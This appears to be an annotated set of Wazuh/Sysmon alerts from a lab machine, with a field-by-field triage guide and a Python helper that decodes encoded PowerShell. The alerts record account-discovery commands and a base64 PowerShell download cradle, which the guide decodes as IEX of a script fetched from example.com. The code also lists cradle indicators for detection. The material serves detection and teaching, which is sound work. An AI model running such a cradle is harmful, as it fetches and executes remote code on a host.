data.win.eventdata.processGuid: {94294ddc-bcca-680a-c00a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 8816 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcca-680a-be0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 4344 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Discovery activity executed Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92031 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534216.1033317 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:54.7314204Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282317 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:54.726
ProcessGuid: {94294ddc-bcca-680a-c10a-000000000e00}
ProcessId: 2332
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net.exe accounts
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:54.726 Process-creation time in UTC as stamped by Sysmon. Use it, not data.win.system.systemTime, when ordering what happened.
data.win.eventdata.processGuid: {94294ddc-bcca-680a-c10a-000000000e00} Sysmon's unique ID for the new process (machine ID, start time and boot session). Unlike a PID it is never reused, so join on it when chaining events.
data.win.eventdata.processId: 2332 Windows PID of the new process. PIDs are recycled after exit; prefer processGuid for joins.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe Full path of the started executable. SysWOW64 is the 32-bit copy of net.exe: the parent is a 32-bit agent under Program Files (x86), so WOW64 file-system redirection resolves "System32" to SysWOW64 for it. Not suspicious on its own.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) Version string from the binary's PE resource. Pin it to the OS build when validating a living-off-the-land binary.
data.win.eventdata.description: Net Command PE resource description. Cosmetic and attacker-controllable in unsigned binaries; never trust it alone.
data.win.eventdata.product: Microsoft® Windows® Operating System PE resource product name. Same caveat as description.
data.win.eventdata.company: Microsoft Corporation PE resource company name. Confirm with the hash or the Authenticode signature, not this string.
data.win.eventdata.originalFileName: net.exe Internal name compiled into the binary. It survives renaming, so compare it with the file name in image to spot renamed tools.
data.win.eventdata.commandLine: net.exe accounts Full command line. `net accounts` prints the local password and lockout policy (ATT&CK T1201, Password Policy Discovery). With wazuh-agent.exe as the parent and SYSTEM as the user, this is most likely the agent's own configuration-assessment (SCA) check rather than an intruder; confirm against the agent's SCA policy and schedule before closing it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ Working directory of the new process. The agent's install folder, consistent with the agent launching it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM Account the process runs as. SYSTEM means a service context, not an interactive user.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} Sysmon's ID for the logon session that started the process. Join on it to gather other Sysmon events from the same session.
data.win.eventdata.logonId: 0x3e7 Windows logon session ID. 0x3e7 (999) is the fixed ID of the SYSTEM logon session; user sessions get unique values you can match to the Logon ID in Security event 4624.
data.win.eventdata.terminalSessionId: 0 Windows session number. 0 is the non-interactive services session; interactive desktops are 1 and above.
data.win.eventdata.integrityLevel: System Mandatory integrity level of the process (Low, Medium, High, System). System is the highest; expect it only for services and their children.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 Hash of the image file, using whichever algorithms the Sysmon config enables (SHA256 here). Match it against a known-good hash for this Windows build; a Microsoft binary will not show up in malware feeds.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} processGuid of the parent. The most reliable key for walking the process tree backwards.
data.win.eventdata.parentProcessId: 3244 PID of the parent at creation time. Recyclable, so cross-check with parentProcessGuid.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe Executable of the parent. The Wazuh agent itself, which explains both the SYSTEM context and the 32-bit child.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" Parent's command line as launched. A bare service path with no arguments is what a Windows service normally looks like.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM Account the parent runs as. Same as the child, so no privilege change at this hop.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 21 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534217.1038550 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon here, so the eventID numbering is Sysmon's, not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Fixed GUID of the Sysmon provider. Useful when a provider name has been renamed or spoofed.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones! For Sysmon, 1 = Process Create.
data.win.system.version: 5 Schema version of this Sysmon event type; it changes when a Sysmon release adds fields. Only matters if a parser breaks.
data.win.system.level: 4 ETW level; 4 = Informational. Sysmon logs everything at this level, so it carries no severity signal.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.). For Sysmon it simply mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:58.9771958Z Time the event was written to the log, about five seconds after the eventdata.utcTime of the process start. Use utcTime to order events and systemTime to measure logging lag.
data.win.system.eventRecordID: 282377 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that logged the event, not of the process being reported. It is the same on every Sysmon event from this host; the created process is in data.win.eventdata.processId.
data.win.system.threadID: 4740 Thread inside the Sysmon service that wrote the event. Ignore for triage.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in. Filter on it to separate Sysmon from the Security and System logs.
data.win.system.computer: Attacker Hostname as recorded by the event log itself; should match agent.name. A mismatch hints at a forwarded or replayed log.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:53.808
ProcessGuid: {94294ddc-bcc9-680a-b70a-000000000e00}
ProcessId: 2176
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bcc6-680a-b30a-000000000e00}
ParentProcessId: 9592
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" Last line of the raw Sysmon message. Every field in it is broken out below as data.win.eventdata.*, so query those rather than parsing this text.
data.win.eventdata.utcTime: 2025-04-24 22:35:53.808 Process-creation time in UTC as stamped by Sysmon. Use it, not systemTime, when ordering what happened.
data.win.eventdata.processGuid: {94294ddc-bcc9-680a-b70a-000000000e00} Sysmon's unique ID for the new process; never reused, unlike the PID. The 92213 file-create alert that follows carries this same GUID, which ties the dropped file to this PowerShell.
data.win.eventdata.processId: 2176 Windows PID of the new PowerShell. It reappears as the parent of PID 12264 in the next 92057 alert.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Full path of the started executable: the 64-bit Windows PowerShell 5.1 host in System32. A copy anywhere else would be a renamed or planted binary.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Version string from the binary's PE resource; build 26100 is the Windows 11 24H2 / Windows Server 2025 line.
data.win.eventdata.description: Windows PowerShell PE resource description. Cosmetic and attacker-controllable in unsigned binaries; never trust it alone.
data.win.eventdata.product: Microsoft® Windows® Operating System PE resource product name. Same caveat as description.
data.win.eventdata.company: Microsoft Corporation PE resource company name. Confirm with the hash or the Authenticode signature, not this string.
data.win.eventdata.originalFileName: PowerShell.EXE Internal name compiled into the binary. It survives renaming, so compare it with the file name in image to catch a renamed powershell.exe.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Full command line. -EncodedCommand takes base64 of UTF-16LE text; this payload decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), a download cradle that fetches a script over HTTPS and runs it in memory without writing it to disk. -NoProfile and -NoLogo skip profile scripts and the banner. The URL is your first indicator (example.com is a reserved documentation domain, so this is a simulated run). The PowerShell path appears twice because the first token is the image and the rest are its arguments: this PowerShell was told to launch another PowerShell with the same payload, and parent and child carry identical command lines.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ Working directory of the new process: the user's profile root, typical of something started from an interactive shell.
data.win.eventdata.user: Attacker\\Attcker1 Account the process runs as. The domain part equals the hostname, so this is a local account, not a domain one.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} Sysmon's ID for the logon session. Join on it to pull every Sysmon event from this user's session.
data.win.eventdata.logonId: 0x26584 Windows logon session ID. Match it to the Logon ID of a Security 4624 event to learn how and from where Attcker1 logged on.
data.win.eventdata.terminalSessionId: 1 Windows session number. 1 is an interactive desktop (console or RDP); 0 would be a service.
data.win.eventdata.integrityLevel: Medium Mandatory integrity level. Medium is a standard, non-elevated user token: the cradle runs with user rights only unless something escalates later.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC Hash of powershell.exe on disk; identical on every PowerShell event from this host, as expected for the same binary. Compare with a known-good hash for build 10.0.26100.3323 rather than with malware feeds.
data.win.eventdata.parentProcessGuid: {94294ddc-bcc6-680a-b30a-000000000e00} processGuid of the parent PowerShell (PID 9592). Search for the Process Create event with this GUID to find what started the chain; it is not among the alerts shown here.
data.win.eventdata.parentProcessId: 9592 PID of the parent at creation time. Recyclable; cross-check with parentProcessGuid.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable of the parent: also powershell.exe, which together with the encoded command is what rule 92057 describes.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA Parent's command line as launched. Identical to the child's, down to the same base64 payload: the chain is PowerShell relaunching itself.
data.win.eventdata.parentUser: Attacker\\Attcker1 Account the parent runs as. Same user as the child, so no privilege change at this hop.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
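The decoding and chain-walking described in the field notes above, as an added example. This is illustration code written for this page, not Wazuh or Sysmon code, and the rule-92057 check is an approximation of what the rule description says, not the rule's actual XML. The sample events are copied from the two 92057 alerts on this page, reduced to the fields the functions need; every other name is the example's own.

```python
"""Triage helpers for Sysmon Event ID 1 alerts that carry an encoded
PowerShell command: decode -EncodedCommand, flag download-cradle
indicators, reproduce the 92057 condition and rebuild the relaunch chain
through parentProcessGuid. Added example, not part of Wazuh."""
import base64
import re

# Abbreviations of -EncodedCommand that powershell.exe accepts (any unambiguous
# prefix works; these are the ones seen in practice). Payload must be base64.
ENC_FLAG = re.compile(r'(?i)(?:^|\s)-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)')
URL = re.compile(r"""(?i)https?://[^\s'")]+""")
# Substring heuristics for in-memory download-and-execute cradles.
CRADLE_MARKERS = ('iex', 'invoke-expression', 'net.webclient', 'downloadstring',
                  'downloadfile', 'invoke-webrequest', 'frombase64string')

# Command line copied from the alerts above (payload split only for line length).
PS_PATH = r'C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe'
PAYLOAD = ('SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A'
           'RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwA'
           'ZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA')
CMDLINE = f'"{PS_PATH}" "{PS_PATH}" -NoLogo -NoProfile -EncodedCommand {PAYLOAD}'

SAMPLE_EVENTS = [
    {  # alert 1745534217.1038550: PID 2176, started by PID 9592
        'processGuid': '{94294ddc-bcc9-680a-b70a-000000000e00}', 'processId': 2176,
        'image': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
        'commandLine': CMDLINE,
        'parentProcessGuid': '{94294ddc-bcc6-680a-b30a-000000000e00}', 'parentProcessId': 9592,
        'parentImage': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
    },
    {  # alert 1745534217.1049378: PID 12264, started by PID 2176
        'processGuid': '{94294ddc-bcd0-680a-c60a-000000000e00}', 'processId': 12264,
        'image': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
        'commandLine': CMDLINE,
        'parentProcessGuid': '{94294ddc-bcc9-680a-b70a-000000000e00}', 'parentProcessId': 2176,
        'parentImage': r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe',
    },
]


def decode_encoded_command(cmdline):
    """Plaintext of the -EncodedCommand argument, or None if there is none.
    PowerShell encodes the script as UTF-16LE before base64, so decode the same way."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    raw = base64.b64decode(b64 + '=' * (-len(b64) % 4))  # tolerate stripped padding
    return raw.decode('utf-16-le')


def is_powershell(path):
    return path.lower().rsplit('\\', 1)[-1] in ('powershell.exe', 'pwsh.exe')


def matches_rule_92057(ev):
    """The condition the rule description states: PowerShell spawned PowerShell
    with a base64-encoded command. Approximation, not the rule's XML."""
    return (is_powershell(ev['image']) and is_powershell(ev['parentImage'])
            and ENC_FLAG.search(ev['commandLine']) is not None)


def triage(ev):
    """Decode the payload and pull out the indicators an analyst pivots on."""
    decoded = decode_encoded_command(ev['commandLine'])
    low = (decoded or '').lower()
    return {
        'rule_92057': matches_rule_92057(ev),
        'decoded': decoded,
        'indicators': [m for m in CRADLE_MARKERS if m in low],
        'urls': URL.findall(decoded or ''),
    }


def process_chain(events, guid):
    """PIDs from the given process back to its oldest known ancestor, youngest
    first. When the parent's own Process Create event is not in `events`, its
    PID is still appended from parentProcessId so the gap is visible."""
    by_guid = {e['processGuid']: e for e in events}
    chain = []
    ev = by_guid.get(guid)
    while ev is not None:
        chain.append(ev['processId'])
        parent = by_guid.get(ev['parentProcessGuid'])
        if parent is None:
            chain.append(ev['parentProcessId'])
        ev = parent
    return chain


if __name__ == '__main__':
    for ev in SAMPLE_EVENTS:
        print(ev['processId'], triage(ev))
    print('chain:', process_chain(SAMPLE_EVENTS, SAMPLE_EVENTS[1]['processGuid']))
```

Run against the page's two events, `triage` returns the decoded IEX cradle, the indicators `iex`, `net.webclient`, `downloadstring` and the URL `https://example.com/test`; `process_chain` yields `[12264, 2176, 9592]`, with 9592 appended from parentProcessId because its own Process Create event is not among these alerts. The marker list is a substring heuristic, so treat it as a triage aid rather than a verdict.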
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 25 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534217.1046613 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon ETW provider that wrote the event. Sysmon here, so the eventID numbering is Sysmon's, not the Security log's.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} Fixed GUID of the Sysmon provider. Useful when a provider name has been renamed or spoofed.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones! For Sysmon, 11 = FileCreate (a file was created or overwritten).
data.win.system.version: 2 Schema version of this Sysmon event type. Only matters if a parser breaks.
data.win.system.level: 4 ETW level; 4 = Informational. Carries no severity signal for Sysmon.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.). For Sysmon it simply mirrors the event ID.
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:59.5779531Z Time the event was written to the log. Use eventdata.utcTime to order events and this to measure logging lag.
data.win.system.eventRecordID: 282382 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 PID of the Sysmon service that logged the event, not of the process that wrote the file. The writer is in data.win.eventdata.processId.
data.win.system.threadID: 4740 Thread inside the Sysmon service that wrote the event. Ignore for triage.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational Event log channel the record lives in. Filter on it to separate Sysmon from the Security and System logs.
data.win.system.computer: Attacker Hostname as recorded by the event log itself; should match agent.name.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:59.551
ProcessGuid: {94294ddc-bcc9-680a-b70a-000000000e00}
ProcessId: 2176
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_24a1orhe.2h5.ps1
CreationUtcTime: 2025-04-24 22:35:59.551
User: Attacker\Attcker1" Last line of the raw Sysmon message. Every field in it is broken out below as data.win.eventdata.*, so query those rather than parsing this text.
data.win.eventdata.utcTime: 2025-04-24 22:35:59.551 Time the file was created, in UTC, as stamped by Sysmon.
data.win.eventdata.processGuid: {94294ddc-bcc9-680a-b70a-000000000e00} Sysmon GUID of the process that wrote the file. It matches the processGuid in the preceding 92057 alert, so the writer is the PowerShell that ran the encoded command.
data.win.eventdata.processId: 2176 PID of the writing process; the same PowerShell instance as in the preceding alert.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Executable that created the file.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_24a1orhe.2h5.ps1 Path of the created file. A __PSScriptPolicyTest_<random>.ps1 in the user's Temp folder is PowerShell's own startup probe: every PowerShell host writes one (and deletes it right away) to check whether AppLocker/WDAC script enforcement applies to it. What trips the rule is a script landing in Temp; the file itself is benign noise, and the real signal is the 92057 alert for the process that wrote it. A child rule of 92213 at level 0 for powershell.exe writing this name pattern keeps the rule useful for genuine drops.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:59.551 File-system creation timestamp of the file. Equal to utcTime here, so the file was new; an older value would mean an existing file was overwritten, or that its timestamp was manipulated.
data.win.eventdata.user: Attacker\\Attcker1 Account that wrote the file; same user as the process.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 22 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
